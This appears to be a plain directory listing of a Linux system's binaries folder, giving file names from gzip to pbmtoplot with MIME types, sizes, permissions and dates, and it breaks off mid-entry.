2025-09-25 04:42:27
gsdj
text/x-shellscript
352 B
-rwxr-xr-x
2025-09-25 04:42:27
gsdj500
text/x-shellscript
352 B
-rwxr-xr-x
2025-09-25 04:42:27
gsettings
application/x-pie-executable
30.3 KB
-rwxr-xr-x
2026-01-28 05:57:54
gslj
text/x-shellscript
353 B
-rwxr-xr-x
2025-09-25 04:42:27
gslp
text/x-shellscript
350 B
-rwxr-xr-x
2025-09-25 04:42:27
gsnd
text/x-shellscript
277 B
-rwxr-xr-x
2025-09-25 04:42:27
gtbl
application/x-pie-executable
126.48 KB
-rwxr-xr-x
2022-03-23 01:56:30
gunzip
text/x-shellscript
2.29 KB
-rwxr-xr-x
2026-07-03 11:55:53
gzexe
text/x-shellscript
6.33 KB
-rwxr-xr-x
2026-07-03 11:55:53
gzip
application/x-pie-executable
91.23 KB
-rwxr-xr-x
2026-07-03 11:55:53
h2ph
text/x-perl
28.54 KB
-rwxr-xr-x
2026-06-23 08:11:00
h2xs
text/x-perl
59.51 KB
-rwxr-xr-x
2026-06-23 08:11:00
hardlink
application/x-pie-executable
34.43 KB
-rwxr-xr-x
2026-03-06 04:10:04
hd
application/x-pie-executable
50.39 KB
-rwxr-xr-x
2026-03-06 04:10:04
head
application/x-pie-executable
42.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
helpztags
text/x-perl
2.46 KB
-rwxr-xr-x
2026-06-15 10:18:01
hexdump
application/x-pie-executable
50.39 KB
-rwxr-xr-x
2026-03-06 04:10:04
hipstopgm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
host
application/x-pie-executable
118.82 KB
-rwxr-xr-x
2026-05-21 02:42:08
hostid
application/x-pie-executable
30.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
hostname
application/x-pie-executable
22.23 KB
-rwxr-xr-x
2022-03-23 01:57:59
hostnamectl
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2026-06-05 03:40:28
htcacheclean
application/x-pie-executable
38.31 KB
-rwxr-xr-x
2026-07-06 04:41:46
htdbm
application/x-pie-executable
26.3 KB
-rwxr-xr-x
2026-07-06 04:41:46
htdigest
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2026-07-06 04:41:46
html2text
application/x-pie-executable
218.32 KB
-rwxr-xr-x
2020-06-23 08:20:10
htop
application/x-pie-executable
277.19 KB
-rwxr-xr-x
2022-03-23 01:58:03
htpasswd
application/x-pie-executable
26.3 KB
-rwxr-xr-x
2026-07-06 04:41:46
hwe-support-status
text/x-script.python
10.58 KB
-rwxr-xr-x
2024-07-11 09:48:43
i386
application/x-pie-executable
26.65 KB
-rwxr-xr-x
2026-03-06 04:10:04
ibd2sdi
application/x-pie-executable
294.74 KB
-rwxr-xr-x
2026-06-20 11:54:34
icontopbm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
iconv
application/x-pie-executable
66.41 KB
-rwxr-xr-x
2026-07-24 12:11:17
id
application/x-pie-executable
38.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
identify
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
identify-im6
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
identify-im6.q16
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
ilbmtoppm
application/x-pie-executable
66.1 KB
-rwxr-xr-x
2021-02-07 06:32:35
imagetops
text/x-shellscript
1.21 KB
-rwxr-xr-x
2021-02-07 06:32:35
imgtoppm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
import
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
import-im6
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
import-im6.q16
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
info
application/x-pie-executable
301.74 KB
-rwxr-xr-x
2022-02-06 12:48:45
infobrowser
application/x-pie-executable
301.74 KB
-rwxr-xr-x
2022-02-06 12:48:45
infocmp
application/x-pie-executable
62.38 KB
-rwxr-xr-x
2026-06-30 09:25:30
infotocap
application/x-pie-executable
86.41 KB
-rwxr-xr-x
2026-06-30 09:25:30
innochecksum
application/x-pie-executable
199.39 KB
-rwxr-xr-x
2026-06-20 11:54:34
install
application/x-pie-executable
142.52 KB
-rwxr-xr-x
2026-01-23 10:51:17
install-info
application/x-pie-executable
103.23 KB
-rwxr-xr-x
2022-02-06 12:48:45
instmodsh
text/x-perl
4.27 KB
-rwxr-xr-x
2026-06-23 08:11:00
ionice
application/x-pie-executable
18.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
ip
application/x-pie-executable
702.05 KB
-rwxr-xr-x
2026-04-15 07:15:26
ipcmk
application/x-pie-executable
22.45 KB
-rwxr-xr-x
2026-03-06 04:10:04
ipcrm
application/x-pie-executable
18.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
ipcs
application/x-pie-executable
38.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
iptables-xml
application/x-pie-executable
96.95 KB
-rwxr-xr-x
2024-01-16 09:14:30
ischroot
application/x-pie-executable
14.2 KB
-rwxr-xr-x
2022-03-23 01:49:54
iscsiadm
application/x-pie-executable
398.46 KB
-rwxr-xr-x
2025-02-11 03:06:32
join
application/x-pie-executable
46.55 KB
-rwxr-xr-x
2026-01-23 10:51:17
journalctl
application/x-pie-executable
78.39 KB
-rwxr-xr-x
2026-06-05 03:40:28
jpegtopnm
application/x-pie-executable
30.09 KB
-rwxr-xr-x
2021-02-07 06:32:35
jq
application/x-pie-executable
30.15 KB
-rwxr-xr-x
2026-04-20 07:29:39
json-patch-jsondiff
text/x-script.python
1004 B
-rwxr-xr-x
2021-09-29 10:31:04
json_pp
text/x-perl
4.88 KB
-rwxr-xr-x
2026-06-23 08:11:00
json_xs
text/x-perl
6.85 KB
-rwxr-xr-x
2025-09-12 12:46:47
jsondiff
text/x-script.python
1004 B
-rwxr-xr-x
2021-09-29 10:31:04
jsonpatch
text/x-script.python
3.77 KB
-rwxr-xr-x
2021-09-29 10:31:04
jsonpointer
text/x-script.python
1.79 KB
-rwxr-xr-x
2020-01-24 03:25:15
jsonschema
text/x-script.python
397 B
-rwxr-xr-x
2020-01-23 06:44:38
kbd_mode
application/x-pie-executable
14.52 KB
-rwxr-xr-x
2022-12-16 02:14:33
kbdinfo
application/x-pie-executable
18.23 KB
-rwxr-xr-x
2022-12-16 02:14:33
kbxutil
application/x-pie-executable
62.83 KB
-rwxr-xr-x
2026-01-05 10:14:39
keep-one-running
text/x-shellscript
3.51 KB
-rwxr-xr-x
2014-01-15 10:24:04
kernel-install
text/x-shellscript
4.79 KB
-rwxr-xr-x
2022-03-11 12:48:49
keyring
text/x-script.python
961 B
-rwxr-xr-x
2022-01-02 02:55:06
kill
application/x-pie-executable
30.23 KB
-rwxr-xr-x
2023-10-31 11:36:04
killall
application/x-pie-executable
31.34 KB
-rwxr-xr-x
2022-03-24 04:29:37
kmod
application/x-pie-executable
166.36 KB
-rwxr-xr-x
2026-04-30 12:32:42
kmodsign
application/x-pie-executable
18.45 KB
-rwxr-xr-x
2021-11-05 05:32:24
landscape-sysinfo
text/x-script.python
624 B
-rwxr-xr-x
2025-06-13 04:13:16
last
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
lastb
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
lastlog
application/x-pie-executable
27.63 KB
-rwxr-xr-x
2024-02-06 12:54:23
lcf
text/x-shellscript
7.6 KB
-rwxr-xr-x
2020-06-16 05:37:53
ld
application/x-pie-executable
1.66 MB
-rwxr-xr-x
2025-12-03 03:08:01
ld.bfd
application/x-pie-executable
1.66 MB
-rwxr-xr-x
2025-12-03 03:08:01
ld.gold
application/x-pie-executable
3.04 MB
-rwxr-xr-x
2025-12-03 03:08:01
ldd
text/x-shellscript
5.32 KB
-rwxr-xr-x
2026-07-24 12:11:17
leaftoppm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
less
application/x-pie-executable
194.38 KB
-rwxr-xr-x
2024-04-27 08:32:45
lessecho
application/x-pie-executable
14.31 KB
-rwxr-xr-x
2024-04-27 08:32:45
lessfile
text/x-shellscript
8.83 KB
-rwxr-xr-x
2021-12-28 07:39:40
lesskey
application/x-pie-executable
23.7 KB
-rwxr-xr-x
2024-04-27 08:32:45
lesspipe
text/x-shellscript
8.83 KB
-rwxr-xr-x
2021-12-28 07:39:40
lexgrog
application/x-pie-executable
99.75 KB
-rwxr-xr-x
2022-03-17 07:03:00
libnetcfg
text/x-perl
15.41 KB
-rwxr-xr-x
2026-06-23 08:11:00
link
application/x-pie-executable
30.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
linux-boot-prober
text/x-shellscript
1.54 KB
-rwxr-xr-x
2021-07-11 02:43:50
linux-check-removal
text/x-perl
3.99 KB
-rwxr-xr-x
2025-02-27 07:59:00
linux-update-symlinks
text/x-perl
6.17 KB
-rwxr-xr-x
2025-02-27 07:59:00
linux-version
text/x-perl
2.63 KB
-rwxr-xr-x
2024-11-13 12:23:42
linux32
application/x-pie-executable
26.65 KB
-rwxr-xr-x
2026-03-06 04:10:04
linux64
application/x-pie-executable
26.65 KB
-rwxr-xr-x
2026-03-06 04:10:04
lispmtopgm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ln
application/x-pie-executable
58.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
lnstat
application/x-pie-executable
22.66 KB
-rwxr-xr-x
2026-04-15 07:15:26
loadkeys
application/x-pie-executable
198.76 KB
-rwxr-xr-x
2022-12-16 02:14:33
loadunimap
application/x-pie-executable
30.32 KB
-rwxr-xr-x
2022-12-16 02:14:33
locale
application/x-pie-executable
57.56 KB
-rwxr-xr-x
2026-07-24 12:11:17
locale-check
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-09-10 11:18:05
localectl
application/x-pie-executable
26.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
localedef
application/x-pie-executable
326.96 KB
-rwxr-xr-x
2026-07-24 12:11:17
logger
application/x-pie-executable
34.97 KB
-rwxr-xr-x
2026-03-06 04:10:04
login
application/x-pie-executable
51.73 KB
-rwxr-xr-x
2024-02-06 12:54:23
loginctl
application/x-pie-executable
58.48 KB
-rwxr-xr-x
2026-06-05 03:40:28
logname
application/x-pie-executable
30.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
logresolve
application/x-pie-executable
14.31 KB
-rwxr-xr-x
2026-07-06 04:41:46
look
application/x-pie-executable
18.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
lowntfs-3g
application/x-pie-executable
114.98 KB
-rwxr-xr-x
2026-07-11 03:55:48
ls
application/x-pie-executable
134.98 KB
-rwxr-xr-x
2026-01-23 10:51:17
lsattr
application/x-pie-executable
14.31 KB
-rwxr-xr-x
2023-10-09 01:50:10
lsb_release
text/x-script.python
3.55 KB
-rwxr-xr-x
2019-08-25 09:11:20
lsblk
application/x-pie-executable
122.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
lscpu
application/x-pie-executable
98.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
lshw
application/x-pie-executable
901.2 KB
-rwxr-xr-x
2025-10-10 01:55:44
lsinitramfs
text/x-shellscript
706 B
-rwxr-xr-x
2024-03-19 12:05:17
lsipc
application/x-pie-executable
50.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
lslocks
application/x-pie-executable
30.7 KB
-rwxr-xr-x
2026-03-06 04:10:04
lslogins
application/x-pie-executable
50.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
lsmem
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
lsmod
application/x-pie-executable
166.36 KB
-rwxr-xr-x
2026-04-30 12:32:42
lsns
application/x-pie-executable
38.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
lsof
application/x-pie-executable
163.62 KB
-rwxr-xr-x
2022-03-24 04:16:24
lspci
application/x-pie-executable
92.08 KB
-rwxr-xr-x
2021-08-30 02:45:58
lspgpot
text/x-shellscript
1.06 KB
-rwxr-xr-x
2017-08-28 10:22:54
lsusb
application/x-pie-executable
246.52 KB
-rwxr-xr-x
2022-03-25 09:53:09
lto-dump-11
application/x-executable
23.73 MB
-rwxr-xr-x
2025-12-18 07:31:24
lwp-download
text/x-perl
10.05 KB
-rwxr-xr-x
2026-05-22 03:44:12
lwp-dump
text/x-perl
2.65 KB
-rwxr-xr-x
2026-05-22 03:44:12
lwp-mirror
text/x-perl
2.36 KB
-rwxr-xr-x
2026-05-22 03:44:12
lwp-request
text/x-perl
15.82 KB
-rwxr-xr-x
2026-05-22 03:44:12
lynx
application/x-pie-executable
1.89 MB
-rwxr-xr-x
2021-10-28 02:31:20
lzcat
application/x-pie-executable
82.52 KB
-rwxr-xr-x
2026-05-28 04:06:40
lzcmp
text/x-shellscript
6.86 KB
-rwxr-xr-x
2026-05-28 04:06:40
lzdiff
text/x-shellscript
6.86 KB
-rwxr-xr-x
2026-05-28 04:06:40
lzegrep
text/x-shellscript
5.87 KB
-rwxr-xr-x
2026-05-28 04:06:40
lzfgrep
text/x-shellscript
5.87 KB
-rwxr-xr-x
2026-05-28 04:06:40
lzgrep
text/x-shellscript
5.87 KB
-rwxr-xr-x
2026-05-28 04:06:40
lzless
text/x-shellscript
1.76 KB
-rwxr-xr-x
2026-05-28 04:06:40
lzma
application/x-pie-executable
82.52 KB
-rwxr-xr-x
2026-05-28 04:06:40
lzmainfo
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2026-05-28 04:06:40
lzmore
text/x-shellscript
2.11 KB
-rwxr-xr-x
2026-05-28 04:06:40
macptopbm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
mailmail3
text/x-script.python
964 B
-rwxr-xr-x
2026-05-22 03:02:45
make
application/x-pie-executable
249.7 KB
-rwxr-xr-x
2022-02-15 03:32:21
make-first-existing-target
text/x-perl
4.79 KB
-rwxr-xr-x
2022-02-15 03:32:21
man
application/x-pie-executable
117.68 KB
-rwxr-xr-x
2022-03-17 07:03:00
man-recode
application/x-pie-executable
35.68 KB
-rwxr-xr-x
2022-03-17 07:03:00
mandb
application/x-pie-executable
139.94 KB
-rwxr-xr-x
2022-03-17 07:03:00
manifest
text/x-shellscript
1.9 KB
-rwxr-xr-x
2020-02-17 02:11:50
manpath
application/x-pie-executable
30.78 KB
-rwxr-xr-x
2022-03-17 07:03:00
mapscrn
application/x-pie-executable
30.32 KB
-rwxr-xr-x
2022-12-16 02:14:33
mawk
application/x-pie-executable
154.79 KB
-rwxr-xr-x
2022-01-23 09:57:23
mcookie
application/x-pie-executable
26.45 KB
-rwxr-xr-x
2026-03-06 04:10:04
md5sum
application/x-pie-executable
42.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
md5sum.textutils
application/x-pie-executable
42.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
mdatopbm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
mdig
application/x-pie-executable
50.4 KB
-rwxr-xr-x
2026-05-21 02:42:08
memusage
text/x-shellscript
7.32 KB
-rwxr-xr-x
2026-07-24 12:11:17
memusagestat
application/x-pie-executable
22.37 KB
-rwxr-xr-x
2026-07-24 12:11:17
mesg
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
mgrtopbm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
migrate-pubring-from-classic-gpg
text/x-shellscript
2.99 KB
-rwxr-xr-x
2021-12-18 09:45:14
mk_modmap
text/x-shellscript
15.78 KB
-rwxr-xr-x
2022-12-16 02:14:33
mkdir
application/x-pie-executable
66.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
mkfifo
application/x-pie-executable
38.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
mknod
application/x-pie-executable
42.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
mksquashfs
application/x-pie-executable
254.68 KB
-rwxr-xr-x
2022-03-25 09:58:38
mktemp
application/x-pie-executable
38.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
mmcli
application/x-pie-executable
273.84 KB
-rwxr-xr-x
2024-07-18 02:24:32
mogrify
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
mogrify-im6
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
mogrify-im6.q16
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
montage
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
montage-im6
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
montage-im6.q16
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
more
application/x-pie-executable
42.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
mount
application/x-pie-executable
46.38 KB
-rwsr-xr-x
2026-03-06 04:10:04
mountpoint
application/x-pie-executable
18.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
mt
application/x-pie-executable
66.73 KB
-rwxr-xr-x
2024-04-28 12:30:36
mt-gnu
application/x-pie-executable
66.73 KB
-rwxr-xr-x
2024-04-28 12:30:36
mtr
application/x-pie-executable
72.25 KB
-rwxr-xr-x
2022-01-11 12:46:46
mtr-packet
application/x-pie-executable
38.3 KB
-rwxr-xr-x
2022-01-11 12:46:46
mtrace
text/x-perl
6.43 KB
-rwxr-xr-x
2026-07-24 12:11:17
mtvtoppm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
mv
application/x-pie-executable
134.52 KB
-rwxr-xr-x
2026-01-23 10:51:17
my_print_defaults
application/x-pie-executable
171.24 KB
-rwxr-xr-x
2026-06-20 11:54:34
myisam_ftdump
application/x-pie-executable
6.35 MB
-rwxr-xr-x
2026-06-20 11:54:34
myisamchk
application/x-pie-executable
6.55 MB
-rwxr-xr-x
2026-06-20 11:54:34
myisamlog
application/x-pie-executable
6.38 MB
-rwxr-xr-x
2026-06-20 11:54:34
myisampack
application/x-pie-executable
6.41 MB
-rwxr-xr-x
2026-06-20 11:54:34
mysql
application/x-pie-executable
6.65 MB
-rwxr-xr-x
2026-06-20 11:54:34
mysql_config_editor
application/x-pie-executable
157.03 KB
-rwxr-xr-x
2026-06-20 11:54:34
mysql_migrate_keyring
application/x-pie-executable
6.54 MB
-rwxr-xr-x
2026-06-20 11:54:34
mysql_secure_installation
application/x-pie-executable
6.47 MB
-rwxr-xr-x
2026-06-20 11:54:34
mysql_ssl_rsa_setup
application/x-pie-executable
194.9 KB
-rwxr-xr-x
2026-06-20 11:54:34
mysql_tzinfo_to_sql
application/x-pie-executable
74.91 KB
-rwxr-xr-x
2026-06-20 11:54:34
mysql_upgrade
application/x-pie-executable
6.55 MB
-rwxr-xr-x
2026-06-20 11:54:34
mysqladmin
application/x-pie-executable
6.5 MB
-rwxr-xr-x
2026-06-20 11:54:34
mysqlanalyze
application/x-pie-executable
6.49 MB
-rwxr-xr-x
2026-06-20 11:54:34
mysqlbinlog
application/x-pie-executable
6.8 MB
-rwxr-xr-x
2026-06-20 11:54:34
mysqlcheck
application/x-pie-executable
6.49 MB
-rwxr-xr-x
2026-06-20 11:54:34
mysqld_multi
text/x-perl
26.73 KB
-rwxr-xr-x
2026-06-20 11:54:34
mysqld_safe
text/x-shellscript
28.45 KB
-rwxr-xr-x
2026-06-20 11:54:34
mysqldump
application/x-pie-executable
6.58 MB
-rwxr-xr-x
2026-06-20 11:54:34
mysqldumpslow
text/x-perl
7.54 KB
-rwxr-xr-x
2026-06-20 11:54:34
mysqlimport
application/x-pie-executable
6.48 MB
-rwxr-xr-x
2026-06-20 11:54:34
mysqloptimize
application/x-pie-executable
6.49 MB
-rwxr-xr-x
2026-06-20 11:54:34
mysqlpump
application/x-pie-executable
6.85 MB
-rwxr-xr-x
2026-06-20 11:54:34
mysqlrepair
application/x-pie-executable
6.49 MB
-rwxr-xr-x
2026-06-20 11:54:34
mysqlreport
text/x-perl
38.1 KB
-rwxr-xr-x
2025-11-18 08:53:19
mysqlshow
application/x-pie-executable
6.49 MB
-rwxr-xr-x
2026-06-20 11:54:34
mysqlslap
application/x-pie-executable
6.5 MB
-rwxr-xr-x
2026-06-20 11:54:34
namei
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
nano
application/x-pie-executable
276.52 KB
-rwxr-xr-x
2026-06-03 10:51:38
nawk
application/x-pie-executable
688.46 KB
-rwxr-xr-x
2026-07-20 10:38:47
nc
application/x-pie-executable
38.63 KB
-rwxr-xr-x
2022-02-23 11:09:43
nc.openbsd
application/x-pie-executable
38.63 KB
-rwxr-xr-x
2022-02-23 11:09:43
neotoppm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
neqn
text/x-shellscript
913 B
-rwxr-xr-x
2022-03-23 01:56:30
netcat
application/x-pie-executable
38.63 KB
-rwxr-xr-x
2022-02-23 11:09:43
networkctl
application/x-pie-executable
102.38 KB
-rwxr-xr-x
2026-06-05 03:40:28
networkd-dispatcher
text/x-script.python
19.71 KB
-rwxr-xr-x
2022-05-04 01:29:43
newgrp
application/x-pie-executable
39.55 KB
-rwsr-xr-x
2024-02-06 12:54:23
ngettext
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2022-03-25 10:31:07
nice
application/x-pie-executable
34.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
nisdomainname
application/x-pie-executable
22.23 KB
-rwxr-xr-x
2022-03-23 01:57:59
nl
application/x-pie-executable
98.57 KB
-rwxr-xr-x
2026-01-23 10:51:17
nm
application/x-pie-executable
43.63 KB
-rwxr-xr-x
2025-12-03 03:08:01
node
application/x-executable
87.17 MB
-rwxr-xr-x
2025-03-27 01:05:59
nodejs
application/x-executable
87.17 MB
-rwxr-xr-x
2025-03-27 01:05:59
nohup
application/x-pie-executable
34.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
notify-send
application/x-pie-executable
18.23 KB
-rwxr-xr-x
2022-04-27 09:23:22
npm
application/javascript
54 B
-rwxr-xr-x
2022-10-11 10:59:35
nproc
application/x-pie-executable
34.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
npx
application/javascript
2.85 KB
-rwxr-xr-x
2024-05-09 10:00:41
nroff
text/x-shellscript
3.22 KB
-rwxr-xr-x
2022-03-23 01:56:30
nsenter
application/x-pie-executable
26.6 KB
-rwxr-xr-x
2026-03-06 04:10:04
nslookup
application/x-pie-executable
118.82 KB
-rwxr-xr-x
2026-05-21 02:42:08
nstat
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2026-04-15 07:15:26
nsupdate
application/x-pie-executable
74.55 KB
-rwxr-xr-x
2026-05-21 02:42:08
ntfs-3g
application/x-pie-executable
159.01 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfs-3g.probe
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfscat
application/x-pie-executable
26.38 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfscluster
application/x-pie-executable
38.38 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfscmp
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfsdecrypt
application/x-pie-executable
42.38 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfsfallocate
application/x-pie-executable
26.38 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfsfix
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfsinfo
application/x-pie-executable
54.38 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfsls
application/x-pie-executable
27.45 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfsmove
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfsrecover
application/x-pie-executable
106.38 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfssecaudit
application/x-pie-executable
78.86 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfstruncate
application/x-pie-executable
26.3 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfsusermap
application/x-pie-executable
18.3 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfswipe
application/x-pie-executable
42.91 KB
-rwxr-xr-x
2026-07-11 03:55:48
numfmt
application/x-pie-executable
54.54 KB
-rwxr-xr-x
2026-01-23 10:51:17
nvidia-detector
text/x-script.python
270 B
-rwxr-xr-x
2025-12-10 09:16:48
objcopy
application/x-pie-executable
162.54 KB
-rwxr-xr-x
2025-12-03 03:08:01
objdump
application/x-pie-executable
365.13 KB
-rwxr-xr-x
2025-12-03 03:08:01
od
application/x-pie-executable
66.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
oem-getlogs
text/x-script.python
8.59 KB
-rwxr-xr-x
2025-07-29 03:25:17
on_ac_power
text/x-shellscript
3.7 KB
-rwxr-xr-x
2025-06-04 02:47:30
open
text/x-perl
18.06 KB
-rwxr-xr-x
2026-07-03 01:05:05
openssl
application/x-pie-executable
977.8 KB
-rwxr-xr-x
2026-07-29 04:56:04
openvt
application/x-pie-executable
22.59 KB
-rwxr-xr-x
2022-12-16 02:14:33
os-prober
text/x-shellscript
4.44 KB
-rwxr-xr-x
2021-07-11 02:43:50
pager
application/x-pie-executable
194.38 KB
-rwxr-xr-x
2024-04-27 08:32:45
palmtopnm
application/x-pie-executable
22.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pamcut
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pamdeinterlace
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pamdice
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pamfile
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pamoil
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pamstack
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pamstretch
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pamstretch-gen
text/x-shellscript
1.31 KB
-rwxr-xr-x
2021-02-07 06:32:35
paperconf
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2022-03-24 12:14:21
partx
application/x-pie-executable
58.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
passwd
application/x-pie-executable
58.57 KB
-rwsr-xr-x
2024-02-06 12:54:23
paste
application/x-pie-executable
34.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
pastebinit
text/x-script.python
16.12 KB
-rwxr-xr-x
2021-11-24 02:53:34
patch
application/x-pie-executable
186.52 KB
-rwxr-xr-x
2022-03-24 04:22:21
pathchk
application/x-pie-executable
34.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
pbget
text/x-shellscript
2.51 KB
-rwxr-xr-x
2019-08-03 05:35:53
pbmclean
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmlife
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmmake
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmmask
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmpage
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmpscale
application/x-pie-executable
14.13 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmreduce
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtext
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtextps
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmto10x
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtoascii
application/x-pie-executable
14.29 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtoatk
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtobbnbg
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtocmuwm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtoepsi
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtoepson
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtog3
application/x-pie-executable
17.13 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtogem
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtogo
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtoicon
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtolj
application/x-pie-executable
18.03 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtomacp
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtomda
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtomgr
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtonokia
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtopgm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtopi3
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtoplot
application/x-pie-executable
